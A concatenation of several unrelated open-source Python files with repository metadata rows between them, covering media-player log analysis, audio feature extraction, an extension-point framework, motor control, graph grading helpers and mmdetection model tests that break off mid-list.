# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""
Responsabilities
Defines the events that modify media_player state
Defines which events are potential defects
Gives the low level support to extract info from the recorded data
For new code here, keep accepting and returning only data structures,
never paths or files.
"""
# events definition
mp_events = {
"version": 1.1,
# <evname>: {
# "desc": <description used in reports to mention the event>,
# "update_names": <list of names of fields updated>,
    #     "other_fields": <list of additional fields to show when mentioning the
# event in a report>
# },
"crash": {
"desc": "media_player crashed.",
"update_names": ["evname", "sample"],
"other_fields": [],
"test_cases": [("crash", "small.mp4")]
},
"mp.im": {
"desc": "Play",
"update_names": ["evname", "sample"],
"other_fields": [],
"test_cases": [("mp.im", 3, "small.mp4")]
},
"p.P._sp": {
"desc": "Start playing",
"update_names": ["evname", "wall_time"],
"other_fields": [],
"test_cases": [("p.P._sp", 1.23)]
},
"p.P.sk": {
"desc": "Seek",
"update_names": ["evname", "seek_to_time"],
"other_fields": [],
"test_cases": [("p.P.sk", 1.23), ("p.P.sk", None)]
},
"p.P.ut.1.0": {
"desc": "Enter update_texture",
"update_names": ["evname", "pyglet_dt", "current_time",
"audio_time", "wall_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.0", 0.02, 2.31, 2.28, 1.21),
("p.P.ut.1.0", 0.02, None, 2.28, 1.21),
("p.P.ut.1.0", None, 2.31, 2.28, 1.21)]
},
"p.P.ut.1.5": {
"desc": "Discard video frame too old,",
"update_names": ["evname", "video_time"],
"other_fields": ["current_time"],
"test_cases": [("p.P.ut.1.5", 1.21)]
},
"p.P.ut.1.6": {
"desc": "Current video frame,",
"update_names": ["evname", "video_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.6", 1.21)]
},
"p.P.ut.1.7": {
"desc": "Early return doing nothing because video_time is None (likely EOV),",
"update_names": ["evname", "rescheduling_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.7", 0.02)]
},
"p.P.ut.1.8": {
"desc": "Image frame is None (?)",
"update_names": ["evname"],
"other_fields": [],
"test_cases": [("p.P.ut.1.8",)]
},
# in log_render_anomalies list only if rescheduling_time < 0
"p.P.ut.1.9": {
"desc": "Re-scheduling,",
"update_names": ["evname", "rescheduling_time", "next_video_time"],
"other_fields": [],
"test_cases": [("p.P.ut.1.9", 0.02, None), ("p.P.ut.1.9", 0.02, 2.7)]
},
# crash_detection relies in this being the last event in the log_entries
"p.P.oe": {
"desc": ">>> play ends",
"update_names": ["evname"],
"other_fields": [],
"test_cases": [("p.P.oe",)]
},
}
# events to examine for defects detection
mp_bads = {"crash", "p.P.ut.1.5", "p.P.ut.1.7", "p.P.ut.1.8"}
class MediaPlayerStateIterator(object):
"""Exposes for analysis the sequence of media_player states
Typical use
mp_states = MediaPlayerStateIterator()
for st in mp_states:
do something with st, the current media_player state.
If desired a callback can be called just before processing an event, the
signature is
fn_pre_event(event, state_before_event)
The mp state is handled as a dict, with keys in cls.fields
"""
fields = {
# real
"evname": None,
"evnum": -1, # synthetic, ordinal last event processed
"sample": None,
"wall_time": None,
"current_time": None,
"audio_time": None,
"seek_to_time": None,
"pyglet_dt": None,
"video_time": None,
"rescheduling_time": None,
"next_video_time": None,
# synthetics, probably invalid after using seek
"pyglet_time": 0,
"frame_num": 0,
}
def __init__(self, recorded_events, events_definition=mp_events, fn_pre_event=None):
self.fn_pre_event = fn_pre_event
self.state = dict(self.fields)
self.events_definition = events_definition
self.iter_events = iter(recorded_events)
version_args = next(self.iter_events)
assert version_args == ("version", self.events_definition["version"])
def __iter__(self):
return self
def __next__(self):
event = next(self.iter_events)
if self.fn_pre_event is not None:
self.fn_pre_event(event, self.state)
event_dict = self.event_as_dict(event)
self.update(event_dict)
return self.state
def event_as_dict(self, event):
names = self.events_definition[event[0]]["update_names"]
updated = {a: b for a, b in zip(names, event)}
return updated
def update(self, event_dict):
self.state.update(event_dict)
self.state["evnum"] += 1
evname = event_dict["evname"]
if evname == "p.P.ut.1.0":
self.state["pyglet_time"] += event_dict["pyglet_dt"]
elif evname == "p.P.ut.1.5" or evname == "p.P.ut.1.9":
self.state["frame_num"] += 1
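# Hedged usage sketch (illustration only, not part of the original module).
# The recorded_events list is invented; a real recording only needs to start
# with the ("version", ...) tuple and use event names defined in mp_events.
def _example_iterate_states():
    recorded_events = [
        ("version", mp_events["version"]),
        ("mp.im", 3, "small.mp4"),
        ("p.P._sp", 0.0),
        ("p.P.ut.1.0", 0.02, 0.02, 0.01, 0.05),
        ("p.P.oe",),
    ]
    states = []
    for state in MediaPlayerStateIterator(recorded_events):
        # the iterator reuses one dict, so copy it if the states are kept
        states.append(dict(state))
    return states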
class TimelineBuilder(object):
"""At each call to player.Player.update_texture we capture selected player
state, before accepting the changes in the event. This is the same as
capturing the state at the end of previous update call.
Output is a sequence of tuples capturing the desired fields.
Meant to extract info on behalf of other sw, especially visualization.
"""
def __init__(self, recorded_events, events_definition=mp_events):
mp = MediaPlayerStateIterator(recorded_events, events_definition, self.pre)
self.mp_state_iterator = mp
self.timeline = []
def pre(self, event, st):
if event[0] == "p.P.ut.1.0":
p = (st["wall_time"], st["pyglet_time"], st["audio_time"],
st["current_time"], st["frame_num"], st["rescheduling_time"])
self.timeline.append(p)
def get_timeline(self):
"""remember video_time and audio_time can be None"""
        # real work is done in the callback pre
for st in self.mp_state_iterator:
pass
# The first entry is bogus, because there was no previous call so discard
return self.timeline[1:]
def timeline_postprocessing(timeline):
""" Eliminates Nones in timeline so other software don't error.
Extra lists are built for the vars with nones, each list with one point
for each None in the form (wall_time, prev_value).
"""
current_time_nones = []
audio_time_nones = []
old_current_time = 0
old_audio_time = 0
filtered_timeline = []
for wall_time, pt, audio_time, current_time, fnum, rt in timeline:
if current_time is None:
current_time = old_current_time
current_time_nones.append((wall_time, old_current_time))
else:
            old_current_time = current_time
if audio_time is None:
audio_time = old_audio_time
audio_time_nones.append((wall_time, old_audio_time))
else:
old_audio_time = audio_time
filtered_timeline.append((wall_time, pt, audio_time, current_time, fnum, rt))
return filtered_timeline, current_time_nones, audio_time_nones
# works for buffered log, needs other implementation if unbuffered
def crash_detected(recorded_events):
crashed = recorded_events[-1][0] != "p.P.oe"
return crashed
class CountBads(object):
"""Helper to report anomalies in the media_player states seen when playing
a sample.
- provides .anomalies_description, a dict <anomaly>: <description>
- calling .count_bads(recorded_events) will return a dict of
anomaly: <count times anomaly detected>
- preprocessing: ad-hoc prefiltering the events stream for noise reduction
"""
def __init__(self, events_definition=mp_events, bads=mp_bads):
self.events_definition = events_definition
self.bads = bads
self.anomalies_description = self.build_anomalies_description()
def build_anomalies_description(self):
"""builds descriptions for the anomalies"""
d = self.events_definition
anomalies_description = {evname: d[evname]["desc"] for evname in self.bads}
anomalies_description["scheduling_in_past"] = "Scheduling in the past"
return anomalies_description
def preprocessing(self, recorded_events):
"""
I see all recordings ending with some potential anomalies in the few
frames just before the '>>> play ends'; visually the play is perfect so
I assume they are false positives if just at EOF. Deleting the offending
events (only if near EOL) to reduce noise in summarize.py
"""
recorded_events = list(recorded_events)
if (len(recorded_events) > 9 and
recorded_events[-2][0] == "p.P.ut.1.7" and
recorded_events[-6][0] == "p.P.ut.1.7" and
recorded_events[-10][0] == "p.P.ut.1.7"
):
del recorded_events[-10]
del recorded_events[-6]
del recorded_events[-2]
elif (len(recorded_events) > 6 and
recorded_events[-2][0] == "p.P.ut.1.7" and
recorded_events[-6][0] == "p.P.ut.1.7"
):
del recorded_events[-6]
del recorded_events[-2]
elif (len(recorded_events) > 2 and
recorded_events[-2][0] == "p.P.ut.1.7"
):
del recorded_events[-2]
return recorded_events
def count_bads(self, recorded_events):
"""returns counts of anomalies as a dict of anomaly: count
recorded_events: media_player events recorded while playing a sample
Notice that 'counters' has one more key than 'bads': "scheduling_in_past"
"""
recorded_events = self.preprocessing(recorded_events)
counters = {k: 0 for k in self.bads}
cnt_scheduling_in_past = 0
mp_states = MediaPlayerStateIterator(recorded_events, self.events_definition)
for st in mp_states:
evname = st["evname"]
if evname in counters:
counters[evname] += 1
elif ("p.P.ut.1.9" and
st["rescheduling_time"] is not None and
st["rescheduling_time"] < 0):
cnt_scheduling_in_past += 1
counters["scheduling_in_past"] = cnt_scheduling_in_past
return counters
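# Hedged usage sketch (illustration only, not part of the original module).
# TimelineBuilder and CountBads consume the same recorded event stream; the
# events below are invented but follow the mp_events definitions above.
def _example_summarize():
    recorded_events = [
        ("version", mp_events["version"]),
        ("p.P.ut.1.0", 0.02, 0.10, 0.09, 0.50),
        ("p.P.ut.1.0", 0.02, 0.12, 0.11, 0.52),
        ("p.P.ut.1.9", -0.01, 0.14),  # scheduling in the past
        ("p.P.oe",),
    ]
    timeline = TimelineBuilder(recorded_events).get_timeline()
    counters = CountBads().count_bads(recorded_events)
    return timeline, counters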
| 37.491071 | 88 | 0.609431 |
5d567e95c7601027cbc4d0f451a26ff9804ba951 | 835 | py | Python | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | src/music_genre_mfcc.py | Cyofanni/music-genre-classification | 05977e25146697426231017feff0624c09bdb96f | [
"MIT"
] | null | null | null | from scikits.talkbox.features import mfcc
import scipy
from scipy.io import wavfile
import numpy as np
import os
import glob
def write_ceps(ceps, filename):
base_filename, ext = os.path.splitext(filename)
data_filename = base_filename + ".ceps"
np.save(data_filename, ceps)
print("Written %s" % data_filename)
def create_ceps(fn):
s_rate, X = scipy.io.wavfile.read(fn)
ceps, mspec, spec = mfcc(X)
write_ceps(ceps, fn)
def read_ceps(genre_list, base_dir):
X, y = [], []
for l, g in enumerate(genre_list):
for fn in glob.glob(os.path.join(base_dir, g, "*.ceps.npy")):
ceps = np.load(fn)
num_ceps = len(ceps)
X.append(np.mean(ceps[int(num_ceps*1/10):int(num_ceps*9/10)], axis=0))
#X.append(np.mean(ceps, axis=0)) #doesn't help, it only increases running time
y.append(l)
return np.array(X), np.array(y)
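# Hedged usage sketch (illustration only, not part of the original module).
# Assumes a GTZAN-style layout (base_dir/<genre>/<track>.wav) and that
# scikits.talkbox is available for the mfcc() call used in create_ceps.
def build_dataset(base_dir, genre_list):
    for genre in genre_list:
        for fn in glob.glob(os.path.join(base_dir, genre, "*.wav")):
            create_ceps(fn)
    return read_ceps(genre_list, base_dir)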
| 26.09375 | 83 | 0.702994 |
b9e92d29f53986ccc9ec9da4292db3cf2da5d11e | 4,961 | py | Python | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 1 | 2020-07-14T13:00:23.000Z | 2020-07-14T13:00:23.000Z | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 94 | 2020-12-11T06:57:31.000Z | 2022-03-15T10:24:06.000Z | corehq/extensions/interface.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | import importlib
import inspect
import itertools
import logging
from enum import Enum
from dimagi.utils.logging import notify_exception
logger = logging.getLogger("commcare.extensions")
class ExtensionError(Exception):
pass
class ResultFormat(Enum):
FLATTEN = 'flatten'
FIRST = 'first'
def flatten_results(point, results):
return list(itertools.chain.from_iterable(results))
def first_result(point, results):
try:
return next(results)
except StopIteration:
pass
RESULT_FORMATTERS = {
ResultFormat.FIRST: first_result,
ResultFormat.FLATTEN: flatten_results
}
class Extension:
def __init__(self, point, callable_ref, domains):
self.point = point
self.callable = callable_ref
self.domains = set(domains) if domains else None
def validate(self, expected_args):
spec = inspect.getfullargspec(self.callable)
unconsumed_args = set(expected_args) - set(spec.args)
if unconsumed_args and not spec.varkw:
raise ExtensionError(f"Not all extension point args are consumed: {unconsumed_args}")
def should_call_for_domain(self, domain):
return self.domains is None or domain in self.domains
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
def __repr__(self):
return f"{self.callable}"
class ExtensionPoint:
def __init__(self, manager, name, definition_function, result_formatter=None):
self.manager = manager
self.name = name
self.definition_function = definition_function
self.providing_args = inspect.getfullargspec(definition_function).args
self.extensions = []
self.result_formatter = result_formatter
self.__doc__ = inspect.getdoc(definition_function)
def extend(self, impl=None, *, domains=None):
def _extend(impl):
if self.manager.locked:
raise ExtensionError(
"Late extension definition. Extensions must be defined before setup is complete"
)
if not callable(impl):
raise ExtensionError(f"Extension point implementation must be callable: {impl!r}")
extension = Extension(self.name, impl, domains)
extension.validate(self.providing_args)
self.extensions.append(extension)
return impl
if domains is not None and not isinstance(domains, list):
raise ExtensionError("domains must be a list")
if domains is not None and "domain" not in self.providing_args:
raise ExtensionError("domain filtering not supported for this extension point")
return _extend if impl is None else _extend(impl)
def __call__(self, *args, **kwargs):
callargs = inspect.getcallargs(self.definition_function, *args, **kwargs)
domain = callargs.get('domain')
extensions = [
extension for extension in self.extensions
if not domain or extension.should_call_for_domain(domain)
]
results = self._get_results(extensions, *args, **kwargs)
if self.result_formatter:
return self.result_formatter(self, results)
return list(results)
def _get_results(self, extensions, *args, **kwargs):
for extension in extensions:
try:
result = extension(*args, **kwargs)
if result is not None:
yield result
except Exception: # noqa
notify_exception(
None,
message="Error calling extension",
details={
"extention_point": self.name,
"extension": extension,
"kwargs": kwargs
},
)
class CommCareExtensions:
def __init__(self):
self.registry = {}
self.locked = False
def extension_point(self, func=None, *, result_format=None):
"""Decorator for creating an extension point."""
def _decorator(func):
if not callable(func):
raise ExtensionError(f"Extension point must be callable: {func!r}")
name = func.__name__
formatter = RESULT_FORMATTERS[result_format] if result_format else None
point = ExtensionPoint(self, name, func, result_formatter=formatter)
self.registry[name] = point
return point
return _decorator if func is None else _decorator(func)
def load_extensions(self, implementations):
for module_name in implementations:
self.resolve_module(module_name)
self.locked = True
def add_extension_points(self, module_or_name):
self.resolve_module(module_or_name)
def resolve_module(self, module_or_name):
if isinstance(module_or_name, str):
importlib.import_module(module_or_name)
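# Hedged usage sketch (illustration only, not part of the original module).
# The extension point and implementation below are made up; they only show the
# decorator flow: define a point, register an extension, then call the point.
_example_extensions = CommCareExtensions()
@_example_extensions.extension_point(result_format=ResultFormat.FLATTEN)
def example_domain_banners(domain):
    """Return extra banner strings to display for the given domain."""
@example_domain_banners.extend(domains=["demo-domain"])
def _demo_domain_banner(domain):
    return ["Welcome to the demo domain"]
# example_domain_banners(domain="demo-domain") == ["Welcome to the demo domain"]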
| 32.854305 | 100 | 0.636767 |
5089a76de2298aeb14b6115ce1c88c159d7cce5e | 720 | py | Python | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | null | null | null | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | null | null | null | motor_control.py | cpu-robotics/Clyde | 345d757a5410cd4903764146c86b4f14af14a797 | [
"MIT"
] | 1 | 2019-04-18T18:24:44.000Z | 2019-04-18T18:24:44.000Z | #!/usr/bin/env python
"""motor_control.py: Motor control via a Sabertooth 2x25 motor controller """
__author__ = "Nick Vazquez"
__copyright__ = "Copyright 2020, Davenport Central Robotics Teams"
# Import all Necessary Classes
import serial
import math
import functions
# Used for the verification of the baud rate by the motor controller
rateVerify = '170'
# Open a serial terminal with the port 'dev/tty0'
drive = serial.Serial(port='/dev/tty0')
# Print the name of the port that was connected to for verification
print(drive.name)
# Used by the Sabertooth motor controller to autodetect the Baud Rate used by the transmitting device
drive.write(rateVerify)
functions.trackDrive(130, 127, 'forward', 127)
| 28.8 | 101 | 0.768056 |
baa184074dfb98baf0749a0a48d296f3cf4e9a22 | 8,129 | py | Python | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
] | 11 | 2016-06-28T13:35:03.000Z | 2021-07-07T06:14:07.000Z | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
] | 37 | 2016-06-29T13:16:38.000Z | 2022-02-27T01:18:08.000Z | grader_lib/datalayer.py | rmok57/sketchresponse | 1bc8123cc6e21137c6b5cc15719ba26ad41bcd54 | [
"MIT"
] | 4 | 2017-10-16T19:35:28.000Z | 2020-08-12T16:17:03.000Z | # """Contains functions and classes for processing function data"""
from __future__ import division
from __future__ import absolute_import
import numpy as np
from .Tag import Tag, Tagables
DEGREES = (3.142/180)
import sys
from . import Gradeable
# helper methods for interface-like class
def _functionId(obj, nFramesUp):
""" Create a string naming the function n frames up on the stack. """
fr = sys._getframe(nFramesUp+1)
co = fr.f_code
return "%s.%s" % (obj.__class__, co.co_name)
def abstractMethod(obj=None):
""" Use this instead of 'pass' for the body of abstract methods. """
raise Exception("Unimplemented abstract method: %s" % _functionId(obj, 1))
# Function "interface"
class Function(Tag, Tagables, object):
"""Base class for Functions."""
# create the Function
# establishes the axes, the size (from the axes), and the tolerance, with default tolerance of 20 pixels
# Function info will be stored in terms of the function itself, not the pixel information
# the actual path is yet to be specified
def __init__(self, xaxis, yaxis, path_info = [], tolerance = dict()):
super(Function, self).__init__()
self.xaxis = xaxis
self.yaxis = yaxis
self.width = xaxis.pixels
self.height = yaxis.pixels
self.xscale = 1.0 * self.width / (xaxis.domain[1] - xaxis.domain[0])
self.yscale = 1.0 * self.height / (yaxis.domain[0] - yaxis.domain[1])
self.tolerance = tolerance
self.set_default_tolerance('pixel', 20)
self.set_default_tolerance('comparison', 20)
self.create_from_path_info(path_info)
        # check if it is a function, and do something if it is not
# helper methods for constructor
def set_default_tolerance(self, key, default_value):
if key not in self.tolerance:
self.tolerance[key] = default_value
def set_tolerance(self, key, value):
self.tolerance[key] = value
# sets the variables related to the path, and finds the domain
def create_from_path_info(self, path_info):
abstractMethod(self)
self.domain = []
## methods to handle pixel <-> math conversions
def xval_to_px(self, xval):
return self.xaxis.coord_to_pixel(xval)
def px_to_xval(self, px):
return self.xaxis.pixel_to_coord(px)
def yval_to_px(self, yval):
return self.yaxis.coord_to_pixel(yval)
def px_to_yval(self, px):
return self.yaxis.pixel_to_coord(px)
## methods for getting various properties of the function at certain locations
# done in math space, not pixel space
def is_between(self, xmin, xmax):
[xleft, xright] = self.domain
if xleft > xmax or xright < xmin:
return False
else:
return True
def between_vals(self, xmin, xmax):
xleft = max(xmin, self.domain[0])
xright = min(xmax, self.domain[1])
# print 'bv', xmin, xmax, xleft, xright
return xleft, xright
def get_value_at(self, xval):
abstractMethod(self)
def get_angle_at(self, xval):
abstractMethod(self)
def get_slope_at(self, xval):
abstractMethod(self)
# def get_mean_value_between(self, xmin, xmax):
# abstractMethod(self)
def get_min_value_between(self, xmin, xmax):
abstractMethod(self)
def get_max_value_between(self, xmin, xmax):
abstractMethod(self)
def get_mean_angle_between(self, xmin, xmax):
# angle = np.arctan2(self.get_value_at(xmax) - self.get_value_at(xmin), xmax - xmin)
# return angle
abstractMethod(self)
def get_min_angle_between(self, xmin, xmax):
abstractMethod(self)
def get_max_angle_between(self, xmin, xmax):
abstractMethod(self)
def get_horizontal_line_crossings(self, yval):
abstractMethod(self)
def get_vertical_line_crossing(self, xval):
abstractMethod(self)
def get_domain(self):
abstractMethod(self)
### Grader functions ###
def is_a_function(self):
abstractMethod(self)
def has_value_y_at_x(self, y, x, yTolerance=None, xTolerance=None):
"""Return whether the function has the value y at x.
Args:
y: the target y value.
x: the x value.
yTolerance(default:None): the y-axis pixel distance within which
the function value is accepted.
xTolerance(default:None): the x-axis pixel distance within which
the function value is accepted.
Returns:
bool:
true if the function value at x is y within tolerances, otherwise
false
"""
if yTolerance is None:
yTolerance = self.tolerance['pixel'] / self.yscale
else:
yTolerance /= self.yscale
if xTolerance is None:
xTolerance = self.tolerance['pixel'] / self.xscale
else:
xTolerance /= self.xscale
# if the min value of the function around the desired x is higher than the desired y
# or if the max value of the function around the desired x is lower
# then it fails
# note that if the function is defined above and below the function, no matter how far apart, this will allow it
# print 'y, x', y, x
ymax = self.get_max_value_between(x - xTolerance, x + xTolerance)
ymin = self.get_min_value_between(x - xTolerance, x + xTolerance)
if ymax is not False and ymin is not False:
return (ymax > y - yTolerance) and (ymin < y + yTolerance)
else:
return False
def is_zero_at_x_equals_zero(self, yTolerance=None, xTolerance=None):
"""Return whether the function is zero at x equals zero.
Args:
yTolerance(default:None): the y-axis pixel distance within which
the function value is accepted.
xTolerance(default:None): the x-axis pixel distance within which
the function value is accepted.
Returns:
bool:
true if the function value at x equals zero is zero within
tolerances, otherwise false
"""
return self.has_value_y_at_x(0, 0, yTolerance=yTolerance,
xTolerance=xTolerance)
def is_greater_than_y_between(self, y, xmin, xmax, tolerance=None):
"""Return whether function is always greater than y in the range xmin to xmax.
Args:
y: the target y value.
xmin: the minimum x range value.
xmax: the maximum x range value.
tolerance(default:None): pixel distance tolerance. If None given uses
default constant 'comparison'.
Returns:
bool:
true if the minimum value of the function in the range (xmin,xmax)
is greater than y within tolerances, otherwise false.
"""
if tolerance is None:
tolerance = self.tolerance['comparison'] / self.yscale
else:
tolerance /= self.yscale
return self.get_min_value_between(xmin, xmax) > y - tolerance
def is_less_than_y_between(self, y, xmin, xmax, tolerance=None):
"""Return whether function is always less than y in the range xmin to xmax.
Args:
y: the target y value.
xmin: the minimum x range value.
xmax: the maximum x range value.
tolerance(default:None): pixel distance tolerance. If None given uses
default constant 'comparison'.
Returns:
bool:
true if the maximum value of the function in the range (xmin,xmax)
is less than y within tolerances, otherwise false.
"""
if tolerance is None:
tolerance = self.tolerance['comparison'] / self.yscale
else:
tolerance /= self.yscale
return self.get_max_value_between(xmin, xmax) < y + tolerance
| 34.888412 | 120 | 0.622217 |
906911366b550eafc1cb245f021457817db4acc0 | 796 | py | Python | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | 3 | 2021-01-26T11:21:31.000Z | 2021-12-31T21:28:18.000Z | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | null | null | null | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | 4 | 2019-01-02T06:45:55.000Z | 2021-06-30T11:51:38.000Z | import sys
from watertools.Collect.MOD17.DataAccessNPP import DownloadData
def main(Dir, Startdate, Enddate, latlim, lonlim, cores=False, Waitbar = 1, hdf_library = None, remove_hdf = 1):
"""
This function downloads MOD17 yearly NPP data for the specified time
interval, and spatial extent.
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
latlim -- [ymin, ymax]
lonlim -- [xmin, xmax]
cores -- amount of cores used
Waitbar -- 1 (Default) will print a waitbar
"""
print('\nDownload yearly MODIS NPP data for period %s till %s' %(Startdate, Enddate))
DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, hdf_library, remove_hdf)
if __name__ == '__main__':
main(sys.argv) | 34.608696 | 112 | 0.680905 |
1ec2bb16d12a4319fb9ebbd0f7d282f1307b7658 | 250 | py | Python | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | null | null | null | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | null | null | null | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | 1 | 2018-08-12T18:47:05.000Z | 2018-08-12T18:47:05.000Z | import sys
import wave
import struct
wi = wave.open(sys.argv[1], 'r')
# n = wi.getnframes()
n = 100000
ai = struct.unpack('h'*n, wi.readframes(n))
bo = open(sys.argv[2], 'w')
for e in ai:
bo.write("%06x\n" % ((e * 0x100) & 0xffffff))
bo.close()
| 16.666667 | 47 | 0.616 |
f7ea22c849e88cb6ec23b7fce557889423f5588a | 53 | py | Python | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | null | null | null | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 1 | 2022-03-20T11:08:45.000Z | 2022-03-20T11:08:45.000Z | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 6 | 2022-03-13T13:10:25.000Z | 2022-03-28T22:18:12.000Z | x = 1
print(777 if (not (x == input_int())) else 42)
| 17.666667 | 46 | 0.584906 |
dc06d60b56c47248c23fa36a24ac0adbdefc621f | 22,110 | py | Python | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
"""pytest tests/test_forward.py."""
import copy
from os.path import dirname, exists, join
import numpy as np
import pytest
import torch
def _get_config_directory():
"""Find the predefined detector config directory."""
try:
# Assume we are running in the source mmdetection repo
repo_dpath = dirname(dirname(dirname(__file__)))
except NameError:
# For IPython development when this __file__ is not defined
import mmdet
repo_dpath = dirname(dirname(mmdet.__file__))
config_dpath = join(repo_dpath, 'configs')
if not exists(config_dpath):
raise Exception('Cannot find config path')
return config_dpath
def _get_config_module(fname):
"""Load a configuration as a python module."""
from mmcv import Config
config_dpath = _get_config_directory()
config_fpath = join(config_dpath, fname)
config_mod = Config.fromfile(config_fpath)
return config_mod
def _get_detector_cfg(fname):
"""Grab configs necessary to create a detector.
These are deep copied to allow for safe modification of parameters without
influencing other tests.
"""
config = _get_config_module(fname)
model = copy.deepcopy(config.model)
return model
def _replace_r50_with_r18(model):
"""Replace ResNet50 with ResNet18 in config."""
model = copy.deepcopy(model)
if model.backbone.type == 'ResNet':
model.backbone.depth = 18
model.backbone.base_channels = 2
model.neck.in_channels = [2, 4, 8, 16]
return model
def test_sparse_rcnn_forward():
config_path = 'sparse_rcnn/sparse_rcnn_r50_fpn_1x_coco.py'
model = _get_detector_cfg(config_path)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
detector.init_weights()
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape, num_items=[5])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train with non-empty truth batch
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_bboxes = [item for item in gt_bboxes]
gt_labels = mm_inputs['gt_labels']
gt_labels = [item for item in gt_labels]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
detector.forward_dummy(imgs)
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_bboxes = [item for item in gt_bboxes]
gt_labels = mm_inputs['gt_labels']
gt_labels = [item for item in gt_labels]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
# test empty proposal in roi_head
with torch.no_grad():
# test no proposal in the whole batch
detector.roi_head.simple_test([imgs[0][None, :]], torch.empty(
(1, 0, 4)), torch.empty((1, 100, 4)), [img_metas[0]],
torch.ones((1, 4)))
def test_rpn_forward():
model = _get_detector_cfg('rpn/rpn_r50_fpn_1x_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
gt_bboxes = mm_inputs['gt_bboxes']
losses = detector.forward(
imgs, img_metas, gt_bboxes=gt_bboxes, return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
@pytest.mark.parametrize(
'cfg_file',
[
